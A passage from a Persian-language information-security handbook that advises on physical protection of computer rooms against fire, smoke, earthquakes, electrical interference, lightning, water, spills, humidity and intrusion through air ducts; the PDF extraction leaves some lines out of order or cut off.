ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻌﻤﻮ ﹰ
ﺁﺗﺶﻧﺸﺎﻧﻲ ﺧﻮﺏ ﺩﺭ ﻧﺰﺩﻳﻜﻲ ﻣﺤﻞ ﻭ ﻫﻤﭽﻨﻴﻦ ﺁﻣﻮﺯﺵ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺧﻮﺏ ﺍﺯ ﺁﻧﻬﺎ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ .ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺨﻠﻴـﺔ
ﺍﺗﻮﻣﺎﺗﻴﻚ ﮔﺎﺯ ﻭ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺁﺑﭙﺎﺵ ﻗﻄﺮﻩﺍﻱ ﻫﺮ ﻛﺪﺍﻡ ﻣﺰﺍﻳﺎ ﻭ ﻣﻌﺎﻳﺒﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺎﻳﺪ ﺑﻪ ﺩﻗﺖ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ.
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻋﻼﻭﻩ ﺑﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ ،ﺳﻴﻢﻛﺸﻲﻫﺎ ﻫﻢ ﻣﺤﻔﺎﻇﺖ ﺷﺪﻩﺍﻧﺪ .ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﺁﺷـﻜﺎﺭﮔﺮﻫﺎﻱ ﺩﻭﺩ ﻭ ﻛﻼﻫﻜﻬـﺎﻱ
ﺁﺑﭙﺎﺷﻬﺎﻱ ﻗﻄﺮﻩﺍﻱ -ﺍﮔﺮ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩﺍﻧﺪ -ﻃﻮﺭﻱ ﻧﺼﺐ ﺷﺪﻩ ﺑﺎﺷﻨﺪ ﻛﻪ ﺳﻴﻤﻬﺎﻱ ﺩﺭﻭﻥ ﺳﻴﻨﻲﻫﺎﻱ ﻛﺎﺑﻞ )ﻏﺎﻟﺒﹰﺎ ﺩﺭ ﺑﺎﻻﻱ ﺳﻘﻔﻬﺎﻱ ﻛﺎﺫﺏ( ﻭ
ﻧﻴﺰ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻛﺎﺑﻞ ﺭﺍ ﭘﻮﺷﺶ ﺩﻫﻨﺪ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٨٢
ﺩﻭﺩ
ﺩﻭﺩ ﺑﺮﺍﻱ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺴﻴﺎﺭ ﻣﺨﺮﺏ ﺍﺳﺖ .ﺩﻭﺩ ﺳﺎﻳﻨﺪﻩﺍﻱ ﻗﻮﻱ ﺍﺳﺖ ﻭ ﺭﻭﻱ ﺷﺎﺧﻜﻬﺎﻱ ﺩﻳﺴﻚ ﻣﻐﻨﺎﻃﻴـﺴﻲ ﺳـﺮﺑﺎﺯ ،ﺩﻳـﺴﻜﻬﺎﻱ
ﻧﻮﺭﻱ ﻭ ﻧﻮﺍﺭ ﮔﺮﺩﺍﻧﻬﺎ ﺟﻤﻊ ﻣﻲﺷﻮﺩ .ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺩﻭﺩ ﺑﻮﺳﻴﻠﺔ ﺧﻮﺩ ﺭﺍﻳﺎﻧﻪ ﺗﻮﻟﻴﺪ ﻣﻲﺷﻮﺩ .ﺁﺗﺶﺳﻮﺯﻱﻫﺎﻱ ﺑﺮﻗﻲ -ﺑﻮﻳﮋﻩ ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺗﻮﺳﻂ
ﻣﺒﺪﻟﻬﺎﻱ ﻣﺎﻧﻴﺘﻮﺭﻫﺎﻱ ﻭﻳﺪﺋﻮﻳﻲ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩﺍﻧﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﻭﺩﻫﺎﻱ ﺗﻨﺪ ﻭ ﺯﻧﻨﺪﻩ ﺗﻮﻟﻴﺪ ﻛﻨﻨﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺎﻳﺮ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍ ﺧﺮﺍﺏ ﻛﻨﺪ ﻭ
ﻧﻴﺰ ﺳﻤﻲ ﻳﺎ ﺳﺮﻃﺎﻧﺰﺍ ﺑﺎﺷﺪ .ﺧﻄﺮ ﻣﻬﻢ ﺩﻳﮕﺮ ﺩﻭﺩﻱ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺳﻴﮕﺎﺭﻫﺎ ﻭ ﭘﻴﭗﻫﺎ ﺑﺮ ﻣﻲﺧﻴﺰﺩ.
ﺩﺭ ﻫﺮ ﺍﺗﺎﻗﻲ ﻛﻪ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﺁﺷﻜﺎﺭﮔﺮ ﺩﻭﺩ ٥٥ﻧﺼﺐ ﻛﻨﻴﺪ ﻭ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﻳﻦ ﺁﺷﻜﺎﺭﮔﺮﻫﺎ ﺩﺭ ﺯﻳﺮ ﻛﻒﻫﺎﻱ ﭘﻠـﻪﺍﻱ
ﻭ ﺑﺎﻻﻱ ﺳﻘﻒ ﻛﺎﺫﺏ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ .ﺩﺭ ﺍﺗﺎﻕ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺑﻪ ﻛﺴﻲ ﺍﺟﺎﺯﻩ ﺍﺳﺘﻌﻤﺎﻝ ﺩﺧﺎﻧﻴﺎﺕ ﻧﺪﻫﻴﺪ.
ﺯﻣﻴﻦﻟﺮﺯﻩ
ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﺔ ﻗﺴﻤﺘﻬﺎﻱ ﺯﻣﻴﻦ ،ﻟﺮﺯﺷﻬﺎﻱ ﻣﻮﺳﻤﻲ ﺭﺍ ﺗﺠﺮﺑﻪ ﻣﻲﻛﻨﺪ .ﺑﺮﺧﻲ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻧﻬﺎ ﺩﺭ ﺯﻣﻴﻦﻟﺮﺯﻩ ﻓﺮﻭ ﻣـﻲﺭﻳﺰﻧـﺪ ﻭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬـﺎ
ﺳﺮﭘﺎ ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﻨﺪ .ﺗﻮﺟﻪ ﺩﻗﻴﻖ ﺑﻪ ﻧﺤﻮﺓ ﺍﺳﺘﻘﺮﺍﺭ ﻃﺎﻗﭽﻪﻫﺎ ﻭ ﻗﻔﺴﻪﻫﺎﻱ ﻛﺘﺎﺏ ﺩﺭ ﺩﻓﺘﺮﺗﺎﻥ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﺣﺘﻤـﺎﻝ ﺍﻳﻨﻜـﻪ ﺭﺍﻳﺎﻧـﻪ ﻭ ﺷـﻤﺎ ﺍﺯ
ﺷﺪﻳﺪﺗﺮﻳﻦ ﺳﻮﺍﻧﺢ ﺟﺎﻥ ﺳﺎﻟﻢ ﺑﺪﺭ ﺑﺮﻳﺪ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﻫﺪ.
ﺍﺯ ﮔﺬﺍﺷﺘﻦ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﺍﺭﺗﻔﺎﻋﺎﺕ ﺯﻳﺎﺩ ﻳﺎ ﻧﺰﺩﻳﻚ ﭘﻨﺠﺮﻩ ﻭ ﻫﻤﻴﻨﻄﻮﺭ ﺍﺯ ﻗﺮﺍﺭﺩﺍﺩﻥ ﺍﺷﻴﺎﻱ ﺳﻨﮕﻴﻦ ﺭﻭﻱ ﻗﻔﺴﻪﻫﺎﻱ ﻧﺰﺩﻳـﻚ ﺭﺍﻳﺎﻧـﻪ ﺑﭙﺮﻫﻴﺰﻳـﺪ.
ﻣﻲﺗﻮﺍﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺯﻳﺮ ﻣﻴﺰﻫﺎﻱ ﻗﻮﻱ ﻗﺮﺍﺭﺩﺍﺩ ﻳﺎ ﺑﻪ ﺳﻄﺤﻲ ﻛﻪ ﺭﻭﻱ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻣﺘﺼﻞ ﻛﺮﺩ .ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﭘـﻴﭻ ﻭ ﻣﻬـﺮﻩ،
ﻧﻮﺍﺭﻫﺎﻱ ﻧﮕﻬﺪﺍﺭﻧﺪﻩ ،ﻳﺎ ﺳﺎﻳﺮ ﻭﺳﺎﻳﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ) .ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺳﺮﻗﺖ ﻛﻤﻚ ﻣﻲﻛﻨﺪ(.
ﭘﺎﺭﺍﺯﻳﺖﻫﺎﻱ ﺍﻟﻜﺘﺮﻳﻜﻲ
ﻣﻮﺗﻮﺭﻫﺎ ،ﭘﻨﻜﻪﻫﺎ ،ﺗﺠﻬﻴﺰﺍﺕ ﺳﻨﮕﻴﻦ ،ﻭ ﺣﺘﻲ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ،ﭘﺎﺭﺍﺯﻳﺘﻬﺎﻱ ﺍﻟﻜﺘﺮﻳﻜﻲ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧـﺪ ﻣﻮﺟـﺐ ﺑـﺮﻭﺯ ﻣـﺴﺎﻳﻞ
ﻣﺘﻨﺎﻭﺏ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺷﻮﺩ .ﺍﻳﻦ ﭘﺎﺭﺍﺯﻳﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﻓﻀﺎ ﻳﺎ ﻛﺎﺑﻠﻬﺎﻱ ﺍﻧﺘﻘﺎﻝ ﺑـﺮﻕ ﻧﺰﺩﻳـﻚ ﻣﺤﻠﺘـﺎﻥ
ﻣﻨﺘﻘﻞ ﺷﻮﻧﺪ.
ﺍﻣﻮﺍﺝ ﺍﻟﻜﺘﺮﻳﻜﻲ ﻧﻮﻉ ﺧﺎﺻﻲ ﺍﺯ ﭘﺎﺭﺍﺯﻳﺘﻬﺎﻱ ﺍﻟﻜﺘﺮﻳﻜﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺷﺎﻣﻞ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﭘﺎﻟﺲ ﻭﻟﺘﺎﮊ ﺑﺎﻻ ﻣﻲﺷﻮﻧﺪ .ﭼﻨﺎﻧﭽﻪ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺑﺎﺷﺪ ﻫﺮ
ﺭﺍﻳﺎﻧﻪ ﺑﺎﻳﺪ ﻳﻚ ﻣﺪﺍﺭ ﺍﻟﻜﺘﺮﻳﻜﻲ ﻣﺠﺰﺍ ﻭ ﻳﻚ ﺳﻴﻢ ﺯﻣﻴﻦ ﺑﺎ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﺻﺎﻓﻲ ﻗﺪﺭﺕ ﺍﻳﺰﻭﻟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺗﺤﺖ ﻫﻴﭻ ﺷﺮﺍﻳﻄﻲ
ﻲ ﺳﻨﮕﻴﻦ ﻣﺪﺍﺭ ﺍﺷﺘﺮﻛﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺭﺳﺎﻧﺎﻫﺎﻱ ﺭﺍﺩﻳﻮﻳﻲ )ﺍﺯ ﺟﻤﻠﻪ ﺗﻠﻔﻨﻬﺎﻱ ﺳﻴﺎﺭ( ﺑﺎﻳﺪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﻭﺭ ﻧﮕﻪ ﺩﺍﺷﺘﻪ ﺷﻮﻧﺪ.
ﻧﺒﺎﻳﺪ ﺑﺎ ﻭﺳﺎﻳﻞ ﺑﺮﻗ ﹺ
ﺻﺎﻋﻘﻪ
ﺻﺎﻋﻘﻪ ﺍﻣﻮﺍﺝ ﺑﺰﺭﮒ ﺑﺮﻕ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ ﻛﻪ ﺣﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﻭﺳﺎﻳﻞ ﺣﻔﺎﻇﺖ ﺍﻟﻜﺘﺮﻳﻜﻲ ﺩﺍﺭﻧﺪ ﺭﺍ ﺧﺮﺍﺏ ﻛﻨﺪ .ﺍﮔﺮ ﺻـﺎﻋﻘﻪ ﺑـﻪ
ﺍﺳﻜﻠﺖ ﻓﻠﺰﻱ ﺳﺎﺧﺘﻤﺎﻥ ﺷﻤﺎ ﺍﺻﺎﺑﺖ ﻛﻨﺪ )ﻳﺎ ﺑﻪ ﺑﺮﻕﮔﻴﺮ ﺁﻥ ﺑﺮﺧﻮﺭﺩ ﻧﻤﺎﻳﺪ( ،ﺟﺮﻳﺎﻥ ﺣﺎﺻﻠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻣﻴﺪﺍﻥ ﻣﻐﻨﺎﻃﻴـﺴﻲ ﻗـﻮﻱ ﺩﺭ ﻣـﺴﻴﺮ
ﺧﻮﺩ ﺗﺎ ﺯﻣﻴﻦ ﺍﻳﺠﺎﺩ ﻛﻨﺪ .ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺎﻳﺪ ﺩﺭ ﺧﻼﻝ ﻃﻮﻓﺎﻧﻬﺎﻱ ﺻﺎﻋﻘﻪﺍﻱ ﺍﺯ ﭘﺮﻳﺰ ﺑﺮﻕ ﺑﻴﺮﻭﻥ ﻛـﺸﻴﺪﻩ ﺷـﻮﻧﺪ؛ ﺍﮔـﺮ ﭼﻨـﻴﻦ ﻛـﺎﺭﻱ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ
ﻧﻴﺴﺖ ﺍﺯ ﺗﺠﻬﻴﺰﺍﺕ ﺑﺎﺯﺩﺍﺭﻧﺪﺓ ﺍﻣﻮﺍﺝ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﮔﺮﭼﻪ ﺍﻳﻦ ﻭﺳﺎﻳﻞ ﺩﺭ ﻣﻘﺎﺑﻞ ﺑﺮﺧﻮﺭﺩ ﻣﺴﺘﻘﻴﻢ ﺩﺳﺘﮕﺎﻩ ﺭﺍ ﺣﻔﺎﻇﺖ ﻧﺨﻮﺍﻫﻨـﺪ ﻛـﺮﺩ ،ﻭﻟـﻲ
ﻭﻗﺘﻲ ﻃﻮﻓﺎﻧﻬﺎ ﺩﻭﺭ ﺑﺎﺷﻨﺪ ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ .ﻭﺍﺳﻄﻪﻫﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﺑﺎﻳﺪ ﺣﺘﻲﺍﻻﻣﻜﺎﻥ ﺍﺯ ﺳﺎﺯﺓ ﻓﻠـﺰﻱ ﺳـﺎﺧﺘﻤﺎﻥ ﺩﻭﺭ ﻧﮕـﺎﻩ ﺩﺍﺷـﺘﻪ ﺷـﻮﻧﺪ.
ﻫﻴﭽﮕﺎﻩ ﺑﻴﺮﻭﻥ ﺳﺎﺧﺘﻤﺎﻥ ﺍﺯ ﻛﺎﺑﻞ ﻣﺴﻲ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ ،ﻣﮕﺮ ﺩﺍﺧﻞ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻓﻠﺰﻱ.
ﺁﺏ
ﺁﺏ ﻣﻲﺗﻮﺍﻧﺪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﻧﺎﺑﻮﺩ ﻛﻨﺪ .ﺍﻭﻟﻴﻦ ﺧﻄﺮ ﺍﺗﺼﺎﻝ ﻛﻮﺗﺎﻩ ﺍﻟﻜﺘﺮﻳﻜﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭﺻﻮﺭﺗﻲ ﭘﻴﺶ ﺧﻮﺍﻫـﺪ ﺁﻣـﺪ ﻛـﻪ ﺁﺏ ﻣﻴـﺎﻥ ﺧﻄـﻮﻁ
ﺣﺎﻭﻱ ﻭﻟﺘﺎﮊ ﻭ ﻳﻚ ﺧﻂ ﺍﻧﺘﻘﺎﻝ ﺯﻣﻴﻦ ﺻﻔﺤﺔ ﻣﺪﺍﺭ ،ﺍﺗﺼﺎﻝ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ.
ﻻ ﺍﺯ ﺑﺎﺭﺍﻥ ﻳﺎ ﺳﻴﻞ ﻭ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺁﺑﭙﺎﺵ ﻗﻄﺮﻩﺍﻱ ﻛﻪ ﺍﺯ ﮐﻨﺘﺮﻝ ﺧﺎﺭﺝ ﻣﻲﺷﻮﻧﺪ ﺟﺎﺭﻱ ﻣﻲﮔـﺮﺩﺩ .ﺁﺏ ﻫﻤﭽﻨـﻴﻦ ﺁﺏ ﻣﻌﻤﻮ ﹰ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺟﺎﻫﺎﻱ ﻋﺠﻴﺐ ﻭ ﻏﺮﻳﺐ ﻣﺎﻧﻨﺪ ﺳﺮﺭﻳﺰ ﺩﺳﺘﺸﻮﺋﻲﻫﺎ ﺩﺭ ﻃﺒﻘﺎﺕ ﺑﺎﻻﺗﺮ ،ﻳﺎ ﺑﺮ ﺍﺛﺮ ﺧﺮﺍﺑﻜﺎﺭﻱﻫﺎ ،ﻭ ﻳﺎ ﺍﺯ ﺩﭘﺎﺭﺗﻤﺎﻥ ﺁﺗﺶﻧـﺸﺎﻧﻲ
ﺟﺮﻳﺎﻥ ﭘﻴﺪﺍ ﻛﻨﺪ.
ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺍﺯ ﻃﺒﻘﺎﺕ ﺯﻳﺮﺯﻣﻴﻦ ﻛﻪ ﺩﺭ ﻣﻌﺮﺽ ﺳﻴﻼﺏ ﻫﺴﺘﻨﺪ ﺑﻴﺮﻭﻥ ﺁﻭﺭﻳﺪ .ﺣﺴﮕﺮﻫﺎﻱ ﺁﺏ ﺭﺍ ﺭﻭﻱ ﺯﻣﻴﻦ ﻃﺒﻘﻪﺍﻱ ﻛﻪ ﺳﺎﻟﻨﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ
ﺩﺭ ﺁﻥ ﻫﺴﺖ ﻭ ﻫﻤﭽﻨﻴﻦ ﺯﻳﺮ ﻃﺒﻘﺎﺕ ﭘﻠﻪﺍﻱ ﻧﺼﺐ ﻛﻨﻴﺪ ﻭ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻗﻄﻊ ﺍﺗﻮﻣﺎﺗﻴﻚ ﺑﺮﻕ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺳﻴﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ.
ﻏﺬﺍ ﻭ ﻧﻮﺷﻴﺪﻧﻲﻫﺎ
ﻏﺬﺍﻫﺎ ﺑﻮﻳﮋﻩ ﻏﺬﺍﻫﺎﻱ ﭼﺮﺏ ﺑﻪ ﺍﻧﮕﺸﺘﺎﻥ ﺍﻓﺮﺍﺩ ﻣﻲﭼﺴﺒﻨﺪ ﻭ ﺍﺯ ﺁﻧﺠﺎ ﺑﻪ ﻫﺮﭼﻪ ﻛﻪ ﻓﺮﺩ ﺑﻪ ﺁﻥ ﺩﺳﺖ ﻣﻲﺯﻧﺪ ﻣﻨﺘﻘﻞ ﻣـﻲﺷـﻮﻧﺪ .ﺍﻳـﻦ ﺍﺗﻔـﺎﻕ
ﻏﺎﻟﺒﹰﺎ ﺳﻄﻮﺡ ﺣﺴﺎﺱ ﻧﺴﺒﺖ ﺑﻪ ﻛﺜﻴﻔﻲ ﻣﺎﻧﻨﺪ ﻧﻮﺍﺭﻫﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻭ ﺩﻳﺴﻜﻬﺎﻱ ﻧﻮﺭﻱ ﺭﺍ ﻧﻴﺰ ﺷﺎﻣﻞ ﻣﻲﺷﻮﺩ .ﻳﻜﻲ ﺍﺯ ﺳﺮﻳﻌﺘﺮﻳﻦ ﺭﻭﺷـﻬﺎﻱ
ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺘﻦ ﻳﻚ ﺻﻔﺤﻪ ﻛﻠﻴﺪ ﺭﻭﻣﻴﺰﻱ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﻧﻮﺷﻴﺪﻧﻲ ﻏﻴﺮ ﺍﻟﻜﻠﻲ ﻳﺎ ﻳﻚ ﻓﻨﺠﺎﻥ ﻗﻬﻮﻩ ﺭﻭﻱ ﺩﻛﻤﻪﻫﺎﻱ ﺁﻥ ﺭﻳﺨﺘﻪ ﺷـﻮﺩ.
٥٦
ﺩﺭ ﺣﺎﻟﺖ ﻛﻠﻲ ﺳﺎﺩﻩﺗﺮﻳﻦ ﻗﺎﻋﺪﻩ ﺍﻳﻤﻦﺗﺮﻳﻦ ﻫﻢ ﻫﺴﺖ :ﻫﻤﺔ ﻏﺬﺍﻫﺎ ﻭ ﻧﻮﺷﺎﺑﻪﻫﺎ ﺭﺍ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧﻮﺩ ﺩﻭﺭ ﻧﮕﻬﺪﺍﺭﻳﺪ.
ﺑﮑﺎﺭ ﺑﺮﻳﺪ .ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻧﻴﺰ ﺑﺎﻳﺪ ﺩﺭ ﻣﺤﻔﻈﻪﻫﺎﻱ ﺿﺪ ﺍﻧﻔﺠﺎﺭ ﻭ ﻳﺎ ﺧﺎﺭﺝ ﺍﺯ ﻣﺤﻮﻃﻪ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ.
• ﺣﺸﺮﺍﺕ -ﺑﺮﺍﻱ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺗﻌﺪﺍﺩ ﺣﺸﺮﺍﺕ ﺩﺭ ﺳﺎﻟﻦ ﺭﺍﻳﺎﻧﻪﺗﺎﻥ ﺍﻗﺪﺍﻣﺎﺕ ﻣﺆﺛﺮ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ.
• ﻟﺮﺯﺵ -ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﺑﺎ ﻟﺮﺯﺵ ﺯﻳﺎﺩ ،ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺭﻭﻱ ﻳﻚ ﺯﻳﺮﺍﻧﺪﺍﺯ ﻻﺳﺘﻴﻜﻲ ﻳﺎ ﻧﺮﻡ ﻗﺮﺍﺭﺩﻫﻴﺪ ،ﻃﻮﺭﻱ ﻛﻪ ﺩﺭﻳﭽـﻪﻫـﺎﻱ ﺗﻬﻮﻳـﺔ
ﻫﻮﺍ ﻣﺴﺪﻭﺩ ﻧﺸﺪﻩ ﺑﺎﺷﻨﺪ.
• ﺭﻃﻮﺑﺖ -ﺭﻃﻮﺑﺖ ﻣﺤﻴﻂ ﺭﺍ ﻛﻨﺘﺮﻝ ﻧﻤﻮﺩﻩ ﻭ ﺩﺭ ﺳﻄﺢ ﻣﻨﺎﺳﺒﻲ ﻧﮕﺎﻩ ﺩﺍﺭﻳﺪ.
ﻛﻨﺘﺮﻝ ﻣﺤﻴﻄﻲ
ﺑﺮﺍﻱ ﺗﺸﺨﻴﺺ ﻣﺸﻜﻼﺕ ﻧﺎﺧﻮﺍﺳﺘﻪ ،ﺑﻪ ﻃﻮﺭ ﻣﺪﺍﻭﻡ ﺩﻣﺎ ﻭ ﺭﻃﻮﺑﺖ ﻧﺴﺒﻲ ﺍﺗﺎﻕ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﻧﻈﺎﺭﺕ ﻭ ﺛﺒﺖ ﻛﻨﻴﺪ .ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻗﺎﻋﺪﻩ ﻛﻠﻲ ،ﻫـﺮ
۱۰۰۰ﻓﻮﺕ ﻣﺮﺑﻊ ﺍﺯ ﻓﻀﺎﻱ ﺍﺩﺍﺭﻱ ﺑﺎﻳﺪ ﺗﺠﻬﻴﺰﺍﺕ ﺛﺒﺖ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩﺵ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺁﻧﭽﻪ ﺛﺒﺖ ﻛﺮﺩﻩﺍﻳﺪ ﺭﺍ ﺩﺭ ﺑـﺎﺯﻩﻫـﺎﻱ ﺯﻣـﺎﻧﻲ
ﻣﻨﻈﻢ ﺑﺮﺭﺳﻲ ﻭ ﮔﺰﺍﺭﺵ ﻛﻨﻴﺪ.
ﺍﻳﻦ ﻗﺎﻋﺪﻩ ﺷﺎﻳﺪ ﺑﻴﺶ ﺍﺯ ﻫﺮ ﻗﺎﻋﺪﻩﺍﻱ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ ﻛﻪ ﻏﺎﻟﺒﹰﺎ ﻫﻢ ﻧﻘﺾ ﻣﻲﺷﻮﺩ. ٥٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٨٤
ﺍﮔﺮ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻫﻮﺍﻳﻲ ﻛﻪ ﺑﻪ ﺍﺗﺎﻕ ﺭﺍﻳﺎﻧﻪ ﺷﻤﺎ ﻫﻮﺍ ﻣﻲﺭﺳﺎﻧﺪ ﺑﻪ ﺍﻧﺪﺍﺯﻩ ﻛﺎﻓﻲ ﺑﺰﺭﮒ ﺑﺎﺷﻨﺪ ،ﻣﻬﺎﺟﻤﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺑﻪ ﻣﺤﻮﻃﺔ
ﻫﺮﭼﻨﺪ ﺍﻳﻤﻦ ﺷﻤﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ .ﻣﺤﻴﻄﻬﺎﻳﻲ ﻛﻪ ﻧﻴﺎﺯ ﺑﻪ ﺗﻬﻮﻳﺔ ﺯﻳﺎﺩ ﻫﻮﺍ ﺩﺍﺭﻧﺪ ﺑﺎﻳﺪ ﺍﺯ ﭼﻨﺪ ﻛﺎﻧﺎﻝ ﻛﻮﭼﻚ ﻳﺎ ﻳﻚ ﻛﺎﻧﺎﻝ ﺑـﺰﺭﮒ ﻛـﻪ ﺩﺍﺭﺍﻱ
ﺗﻮﺭﻱﻫﺎﻱ ﺟﻮﺵ ﺩﺍﺩﻩ ﺷﺪﻩ ﺑﻪ ﺩﺭﻳﭽﻪﻫﺎﻱ ﻫﻮﺍ ﻳﺎ ﺩﺍﺧﻞ ﻛﺎﻧﺎﻟﻬﺎ ﻣﻲﺑﺎﺷﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ .ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﺑﺎ ﺍﻣﻨﻴﺖ ﺧﻴﻠﻲ ﺯﻳﺎﺩ ،ﻣﻲﺗـﻮﺍﻥ ﺩﺭ
ﺩﺍﺧﻞ ﻛﺎﻧﺎﻟﻬﺎ ﺍﺯ ﺁﺷﻜﺎﺭﺳﺎﺯﻫﺎﻱ ﺣﺮﻛﺘﻲ ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ.
ﺩﻳﻮﺍﺭﻫﺎﻱ ﺷﻴﺸﻪﺍﻱ
